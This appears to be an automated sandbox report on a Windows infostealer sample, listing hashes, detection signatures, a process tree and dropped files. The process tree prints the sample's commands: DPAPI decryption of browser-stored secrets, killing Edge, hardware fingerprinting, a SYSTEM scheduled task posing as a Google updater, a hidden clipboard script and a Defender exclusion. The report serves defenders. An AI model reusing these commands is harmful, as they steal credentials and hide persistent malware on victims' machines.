Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
22s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
11/05/2024, 07:36
Behavioral task
behavioral1
Sample
6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Resource
win7-20240215-en
General
-
Target
6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
-
Size
37.6MB
-
MD5
dbcc5cfb5b91fae4370930affd3d7ef9
-
SHA1
5e5598375c5abeee8c18c9c28a5138e3763df29b
-
SHA256
6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
-
SHA512
0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
-
SSDEEP
393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2128 powershell.exe 5036 powershell.exe 4192 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe -
Loads dropped DLL 1 IoCs
pid Process 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2572 cmd.exe 4448 cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 452 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2988 tasklist.exe 3356 tasklist.exe -
Kills process with taskkill 1 IoCs
pid Process 2424 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 5036 powershell.exe 5036 powershell.exe 1492 powershell.exe 1492 powershell.exe 2160 powershell.exe 2160 powershell.exe 2128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 2988 tasklist.exe Token: SeDebugPrivilege 2424 taskkill.exe Token: SeDebugPrivilege 3356 tasklist.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeIncreaseQuotaPrivilege 4584 WMIC.exe Token: SeSecurityPrivilege 4584 WMIC.exe Token: SeTakeOwnershipPrivilege 4584 WMIC.exe Token: SeLoadDriverPrivilege 4584 WMIC.exe Token: SeSystemProfilePrivilege 4584 WMIC.exe Token: SeSystemtimePrivilege 4584 WMIC.exe Token: SeProfSingleProcessPrivilege 4584 WMIC.exe Token: SeIncBasePriorityPrivilege 4584 WMIC.exe Token: SeCreatePagefilePrivilege 4584 WMIC.exe Token: SeBackupPrivilege 4584 WMIC.exe Token: SeRestorePrivilege 4584 WMIC.exe Token: SeShutdownPrivilege 4584 WMIC.exe Token: SeDebugPrivilege 4584 WMIC.exe Token: SeSystemEnvironmentPrivilege 4584 WMIC.exe Token: SeRemoteShutdownPrivilege 4584 WMIC.exe Token: SeUndockPrivilege 4584 WMIC.exe Token: SeManageVolumePrivilege 4584 WMIC.exe Token: 33 4584 WMIC.exe Token: 34 4584 WMIC.exe Token: 35 4584 WMIC.exe Token: 36 4584 WMIC.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 4344 wrote to memory of 4676 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 92 PID 4344 wrote to memory of 4676 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 92 PID 4676 wrote to memory of 1436 4676 cmd.exe 93 PID 4676 wrote to memory of 1436 4676 cmd.exe 93 PID 4676 wrote to memory of 5036 4676 cmd.exe 94 PID 4676 wrote to memory of 5036 4676 cmd.exe 94 PID 5036 wrote to memory of 512 5036 powershell.exe 95 PID 5036 wrote to memory of 512 5036 powershell.exe 95 PID 512 wrote to memory of 2260 512 csc.exe 96 PID 512 wrote to memory of 2260 512 csc.exe 96 PID 4344 wrote to memory of 4336 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 97 PID 4344 wrote to memory of 4336 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 97 PID 4344 wrote to memory of 3088 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 98 PID 4344 wrote to memory of 3088 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 98 PID 3088 wrote to memory of 2988 3088 cmd.exe 100 PID 3088 wrote to memory of 2988 3088 cmd.exe 100 PID 4336 wrote to memory of 4188 4336 cmd.exe 99 PID 4336 wrote to memory of 4188 4336 cmd.exe 99 PID 4344 wrote to memory of 756 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 102 PID 4344 wrote to memory of 756 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 102 PID 756 wrote to memory of 2424 756 cmd.exe 103 PID 756 wrote to memory of 2424 756 cmd.exe 103 PID 4344 wrote to memory of 2228 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 104 PID 4344 wrote to memory of 2228 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 104 PID 4344 wrote to memory of 2572 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 105 PID 4344 wrote to memory of 2572 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 105 PID 2228 wrote to memory of 3356 2228 cmd.exe 106 PID 2228 wrote to memory of 3356 2228 cmd.exe 106 PID 2572 wrote to memory of 1492 2572 cmd.exe 107 PID 2572 wrote to memory of 1492 2572 cmd.exe 107 PID 4344 wrote to memory of 4448 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 108 PID 4344 wrote to memory of 4448 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 108 PID 4448 wrote to memory of 2160 4448 cmd.exe 109 PID 4448 wrote to memory of 2160 4448 cmd.exe 109 PID 4344 wrote to memory of 1812 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 110 PID 4344 wrote to memory of 1812 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 110 PID 4344 wrote to memory of 4512 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 111 PID 4344 wrote to memory of 4512 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 111 PID 4344 wrote to memory of 3908 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 112 PID 4344 wrote to memory of 3908 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 112 PID 4344 wrote to memory of 1976 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 113 PID 4344 wrote to memory of 1976 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 113 PID 1976 wrote to memory of 2128 1976 cmd.exe 114 PID 1976 wrote to memory of 2128 1976 cmd.exe 114 PID 1812 wrote to memory of 4584 1812 cmd.exe 116 PID 1812 wrote to memory of 4584 1812 cmd.exe 116 PID 4344 wrote to memory of 4756 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 117 PID 4344 wrote to memory of 4756 4344 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:1436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES341B.tmp" "c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\CSC818140766A5C469DBC3C62159FB5524.TMP"5⤵PID:2260
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:4512
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:4452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵PID:3908
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Creates scheduled task(s)
PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.cmdline"4⤵PID:3808
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D11.tmp" "c:\Users\Admin\AppData\Local\Temp\mctnrend\CSCF38C7E581E3047888C51AE4E1E55E0A7.TMP"5⤵PID:2448
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4756
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵PID:1368
-
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵PID:4548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:2884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4192
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵PID:2776
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:1712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5036
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1396
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:2876
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:1796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"2⤵PID:836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wininit.exe3⤵PID:2516
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"4⤵PID:2768
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD593f90bda499e44e7497ed86627232b18
SHA1711d3ed2e1d427dd6633ac3f1f258382694ac050
SHA256e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2
SHA512edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
-
Filesize
146B
MD514a9867ec0265ebf974e440fcd67d837
SHA1ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA51236c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
1KB
MD546d6c89b6a449ce91c1a3691c516e10e
SHA1dedf2c05d83a8fc311e39fa86af575866f9f7ece
SHA256f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f
SHA512bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd
-
Filesize
1KB
MD540ea760a8d4100ec0132da07107f9cab
SHA10b4c1dee23c6634bb6f8aa898929e7008959c5ce
SHA2568c233cf826eaa081640bde9ee53964cf0997a9cbdb6c0b4f8a0dbe29da2458f0
SHA512e136f8d523c040e75255702803021566da0f84b810b27ca48f663e2d83e803e9a9234d285e8ae39c5adab9546312dd6462d0d0d3f94876970c61e1f3c269077e
-
Filesize
1KB
MD56bb13bcb668522531e12b8aa780989f2
SHA113d46ee674ef257f93c43b4c229e66cf35a03167
SHA256ab4d0308827df69bcae352d77b23a5de47915734d2e279118068597a4c8ec53a
SHA512d3a58aa9654e7180e633fdf4242bdaca48f835a1bb1b3344f1c17d397bb75e7b0a85f4b086991f55b3407873d7d00924522087b066affd88e9942b5912967de0
-
Filesize
1KB
MD5050b5340324990343d83d43f32b58348
SHA1fdc7e34990046a1f043dcff942fd57cfef8078d4
SHA2568305dab8650041e8863245b5500339e23e8d09fc0ef4e66802276f37f4c1a79c
SHA512037505c00b9a6f34f292a87b9292e13e4c7f0c37dc8fec17a582717eb489cc1462da28f0351f5014e9c9ce72fc5cd8183f75d92e4887e866d02eada1bd64e2ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD59e56d110863764bf3028af3b9a92f23e
SHA1037de48073f1fbbccff72ddd01156ab4e0e2a283
SHA256d78318afa5a89b0002e39cc49dd84081aeccc30883f03ba575e2e955abe31192
SHA512d122360fc968fc47577d1a691a87d077de9a6cf7133db2be75e73be7054a5e0221dd35dfb284940187b956dbbace56a2cdd3240f4d2517829d13ba6690250806
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize1.8MB
MD566a65322c9d362a23cf3d3f7735d5430
SHA1ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA5120a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
-
Filesize
379B
MD518047e197c6820559730d01035b2955a
SHA1277179be54bba04c0863aebd496f53b129d47464
SHA256348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA5121942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877
-
Filesize
3KB
MD5eb58dbe03d1b93d8a96c67783f53dd26
SHA19f15357b4878d633e8b2f2d796c39701212ce63e
SHA25619056ffa65c9bbf1a1cf936d7c5334d5ca809f4124f2f5c5f75d8cdfab22af07
SHA512dd26df0ae30a212b4ce214ca0438f96f9f7a54c446aa89ad22a687af426c2e3b785f0ef3d2e987ceb6474fae8b7aa18f85fec7a81e613a36624a231a25e23ddd
-
Filesize
652B
MD5f48ac7dfbfda82c97609716a05853d14
SHA1fe9e419ae14375eaaf0963be6c954649c238db09
SHA2561d749ded5523936dd849bba0e45f692d0f772fe58e01d75f42e5fb8644cf2bcd
SHA5127baf96cf72e5bd56aac778be21f9886ccdaa8e1cd30d05d09392362bc385ce66a8ab26831a8228729485211898d359f9c235ef890c3e9425a46d0b54e4bed534
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD5212306e615dad0968457af27a94ae92c
SHA15e71813de6e6dc23816cac9f7d31c055135e65e2
SHA2567349202208eb796aa93c4094ee1b8db13bdf7608f445e7c42124f8d3dc6d51d0
SHA5126d78ff17af372237223360c0f44ff02b1279da4af779c33c1408dcb466506681be60628f6df10af0f86102abc46c90fbd1d7377fb0b9b8355c824ee733d6d0ce
-
Filesize
652B
MD578a4c9e2e691607e82e1cfde039cc162
SHA138e9c574f3591c335ee1ac76f71453b05a7c6ddf
SHA2566870c02ab68204d57e74325acb5c0da6f618ef0374802c7c891cc451d701f460
SHA512e744cfd77578192339386a2f1ea4b255bfff668c742b5e07e2bbfb697c29da2a20ab9384fcd641f4c04b5cfb0c59361b35f9ace1a475d5c6445c74567873f393
-
Filesize
311B
MD57bc8de6ac8041186ed68c07205656943
SHA1673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA25636865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA5120495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba
-
Filesize
369B
MD5c92fb2951a2884189fd4d2ea33b8cad6
SHA10cfb61840d77c74da6e8b9d630c2141ae4266362
SHA2562c1b61bcc010365793c12e9e1f9e4cc2e597443775dad05eb08fff5c067433a1
